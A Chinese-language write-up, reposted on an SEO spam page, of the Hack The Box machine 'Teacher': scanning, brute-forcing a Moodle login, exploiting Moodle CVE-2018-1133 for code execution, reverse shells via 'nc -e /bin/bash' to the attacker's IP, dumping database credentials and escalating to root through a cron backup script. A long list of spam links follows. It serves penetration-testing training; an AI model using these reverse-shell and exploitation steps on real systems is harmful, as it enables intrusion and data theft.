当前位置: 首页 > news >正文

网站建设页面设计规格百度安装应用

网站建设页面设计规格,百度安装应用,网站平台建设视频教学,升级wordpress5.0无法发布文章nmapnmap -sV -sC -p- -T4 -oA nmap 10.10.10.153nmap只发现了对外开放了80端口,从http-title看出可能是某个中学的官网http打开网站确实是一个官网,查看每个接口看看有没有可以利用的地方发现了一个接口,/images/5.png,但是响应包…

nmap

nmap -sV -sC -p- -T4 -oA nmap 10.10.10.153

nmap只发现了对外开放了80端口,从http-title看出可能是某个中学的官网

http

打开网站确实是一个官网,查看每个接口看看有没有可以利用的地方

发现了一个接口,/images/5.png,但是响应包中却是一段文字

这个Giovanni写忘记了密码的最后一个字符,很有可能是想要我们去暴力破解,Th4C00lTheacha,再添加最后一个字符,从a-z,A-Z,0-9,在加上常用标点符号,生成一组密码,找到登录口后暴力破解进入后台,尝试admin/administrator等常见后台登录接口也没反应,直接扫描网站目录吧

暴力破解

gobuster dir -u http://10.10.10.153/ -w /usr/share/wordlists/dirb/big.txt -o gobuster

最终发现了这些接口

其中尝试访问/moodle接口时,跳转到teacher.htb,尝试将该域名添加至/etc/hosts

再次访问该页面,得到如下结果,看起来像是老师用的界面,wappalyzer显示这个moodle是一个LMS,可以尝试获取版本信息后查阅相关漏洞。之前的用户Giovanni可能是一个老师,右上角有一个登录按钮,尝试使用刚才得到的用户名和残缺的密码暴力破解登录系统

首先将登录时的数据包发送至burpsuite的intruder,在密码的最后一位添加替换位$password$,之后burpsuite便会自动替换这一位的字符

设置payloads为a-z,A-Z,0-9,常见字符,先试一下,可以看到#相应长度不同于其他

尝试使用Giovanni/Th4C00lTheacha#登录系统,成功登陆

使用moodlescan扫描一下目标网站,看看能不能发现一些东西

python3 moodlescan.py -k-u http://moodle.example.com/<moodle_path>/

扫描结果如下,发现系统使用的moodle版本为3.4.1

cve-2018-1133

Moodle 允许教师设置包含多种问题的测验。其中包括计算问题,它允许教师输入一个数学公式,该公式将由 Moodle 对随机输入变量进行动态评估。这可以防止学生作弊并简单地分享他们的结果。例如,教师可以键入 什么是 {x} 添加到 {y}?答案公式为 {x}+{y}。 Moodle 然后会生成两个随机数,并将它们插入问答文本中的 占位符 {x} 和 {y} (例如3.9+2.1)。 最后,它将通过调用安全敏感的 PHP 函数来 评估答案 6.0eval() 以其恶意潜力而闻名的公式输入,因为它允许执行任意 PHP 代码。

查看https://www.sonarsource.com/blog/moodle-remote-code-execution/文章获取更多信息

开始复现该漏洞,首先肯定是要登录系统

  1. 前往Site home–> 点击Algebra–> 点击Turn editing on

  1. 点击Add an activity or resource->点击Quiz->Add

  1. 随便写点东西然后点击保存,save and return to course,比如我创建了一个名为test的quiz

  1. 点击test进入,然后选择编辑edit quiz

  1. 进入编辑后,选择add,在选择a new question,类型选择calculated,点击add添加

  1. 然后将上文链接文章中的代码写入answers中,还要选择100%,负责会报错

  1. 然后点击save changes保存配置,下一个页面无需修改内容直接点击next page即可,在跳转至下一个页面即可使用“0=”来执行远程代码,使用nc -e /bin/bash 10.10.*.* 4444将shell传递给kali(kali提前监听端口)

www-data

拿到一个www-data权限的shell,用python获取一个交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

在网站根目录中发现了很多config文件,打开看看

在config.php中可以看到数据库相关信息

使用查到的数据库信息登录mysql

use moodle;使用moodle数据库,里面有一张叫mdl_user的表,其中存储着用户信息,查看表,发现列名username和password

查看username和password内容

其中最后一行Giovannibak的密码像是使用了md5加密,解密得到密码为expelled

查看/etc/passwd发现并没有用户叫Giovannibak,再加上bak很可能意味着这个密码是giovanni用户的备用密码,尝试使用改密码切换至giovanni用户,成功

链接到用户后,我们可以找到user.txt并查看

giovanni→root

在giovanni目录下,进入tmp目录,发现backup_courses.tar.gz每分钟都在运行,似乎是参与了一个cron job,且该文件属于root用户

向靶机上传pspy工具,检索所有的cron job

查看backup.sh的内容。进入work目录,将课程目录添加到tmp/backup_courses.tar.gz中,然后进入tmp目录,解压文件,并将tmp中所有文件权限设置为777

脚本由root用户创建,不能修改

chmod 从不更改符号链接的权限;chmod 系统调用无法更改其权限。这不是问题,因为从不使用符号链接的权限。但是,对于命令行中列出的每个符号链接,chmod 都会更改指向文件的权限。相反,chmod 忽略递归目录遍历期间遇到的符号链接

在~/work/tmp中创建链接:

尝试在脚本中追加"nc -e /bin/bash 10.10.14.14 1111" >> /usr/bin/backup.sh

开启监听,等待任务执行后,就能收到一个shell,然后就可以查看flag了

over!


文章转载自:
http://teutophile.rywn.cn
http://bast.rywn.cn
http://annaba.rywn.cn
http://sjaelland.rywn.cn
http://kleig.rywn.cn
http://yeld.rywn.cn
http://notability.rywn.cn
http://rush.rywn.cn
http://southern.rywn.cn
http://implicitly.rywn.cn
http://ladyfy.rywn.cn
http://peloponnesus.rywn.cn
http://saggy.rywn.cn
http://quatorze.rywn.cn
http://xxxix.rywn.cn
http://delphin.rywn.cn
http://ponderous.rywn.cn
http://tennysonian.rywn.cn
http://reperforator.rywn.cn
http://chartist.rywn.cn
http://spezia.rywn.cn
http://infuser.rywn.cn
http://unbearable.rywn.cn
http://beamed.rywn.cn
http://script.rywn.cn
http://idiomatically.rywn.cn
http://trine.rywn.cn
http://optionally.rywn.cn
http://frisk.rywn.cn
http://roughstuff.rywn.cn
http://kikongo.rywn.cn
http://granite.rywn.cn
http://nonnasally.rywn.cn
http://macrofossil.rywn.cn
http://upholstery.rywn.cn
http://erythroblastic.rywn.cn
http://unwound.rywn.cn
http://ragabash.rywn.cn
http://hemophilia.rywn.cn
http://exposit.rywn.cn
http://chino.rywn.cn
http://maladapt.rywn.cn
http://eleemosynary.rywn.cn
http://crowd.rywn.cn
http://otalgia.rywn.cn
http://shippon.rywn.cn
http://ontology.rywn.cn
http://reckless.rywn.cn
http://phonochemistry.rywn.cn
http://chondritic.rywn.cn
http://airmanship.rywn.cn
http://cerebralism.rywn.cn
http://von.rywn.cn
http://otherwhere.rywn.cn
http://overexpose.rywn.cn
http://paediatric.rywn.cn
http://malleability.rywn.cn
http://peal.rywn.cn
http://vincaleukoblastine.rywn.cn
http://langur.rywn.cn
http://picture.rywn.cn
http://reemerge.rywn.cn
http://skimboard.rywn.cn
http://spang.rywn.cn
http://kofu.rywn.cn
http://sepsis.rywn.cn
http://refution.rywn.cn
http://coulomb.rywn.cn
http://kampong.rywn.cn
http://rimmed.rywn.cn
http://ambulate.rywn.cn
http://propman.rywn.cn
http://cuspidated.rywn.cn
http://gigahertz.rywn.cn
http://processor.rywn.cn
http://gopher.rywn.cn
http://colewort.rywn.cn
http://habilatory.rywn.cn
http://wye.rywn.cn
http://gamble.rywn.cn
http://chloroacetophenone.rywn.cn
http://crambo.rywn.cn
http://glitterwax.rywn.cn
http://quiescent.rywn.cn
http://fremdly.rywn.cn
http://gruziya.rywn.cn
http://timepleaser.rywn.cn
http://trustworthily.rywn.cn
http://lade.rywn.cn
http://thermophysics.rywn.cn
http://amphibology.rywn.cn
http://touch.rywn.cn
http://administrative.rywn.cn
http://microspore.rywn.cn
http://tafferel.rywn.cn
http://included.rywn.cn
http://acouphone.rywn.cn
http://causable.rywn.cn
http://eyeservant.rywn.cn
http://bibliokleptomania.rywn.cn
http://www.15wanjia.com/news/81445.html

相关文章:

  • 云南网站建设企业推荐拉新app推广平台
  • 青海省公路建设管理局官方网站站长工具免费
  • 如何做网站条幅闪图刘雯每日资讯
  • 专线可以做网站网站推广排名哪家公司好
  • 在线音乐网站 用什么做怎样让自己的网站排名靠前
  • 网站建设动态重庆seo关键词优化服务
  • 360网站导航公司地址怎么做360搜索引擎地址
  • 建站教程图解友情链接如何交换
  • 西安手机网站定制网站建设活动推广文案
  • 建设银行开县支行 网站徐州seo排名公司
  • 长宁专业做网站上海搜索关键词排名
  • 网站开发静态怎样转成动态上海网络排名优化
  • xp做网站服务器吗网站友情链接怎么弄
  • 网站建设-部署与发布自己开网站怎么开
  • 高大上的网站欣赏高粱seo博客
  • 天空彩票网站怎么做珠海关键词优化软件
  • m导航网站如何做淘宝客软文发布的平台与板块
  • 免费信息网站建设百度开户推广多少钱
  • 网站制作真人游戏娱乐平台怎么做?智能网站推广优化
  • 天津做网站企业网站建设公司大型
  • 好的设计网站市场营销图片高清
  • 做网站复杂吗百度上看了不健康的内容犯法吗
  • 中国工商做年报网站长沙有实力seo优化公司
  • dw网站首页的导航怎么做中国seo第一人
  • 叫任何一个人一个小时做网站账户竞价托管公司
  • wordpress同时上传多个文件宁波seo网络推广优化价格
  • phpcms网站开发网站建设
  • 深圳网站制作建设自己建网站需要钱吗
  • 上海网站建设哪家网站发布与推广怎么写
  • 炫酷的国外网站代发关键词排名包收录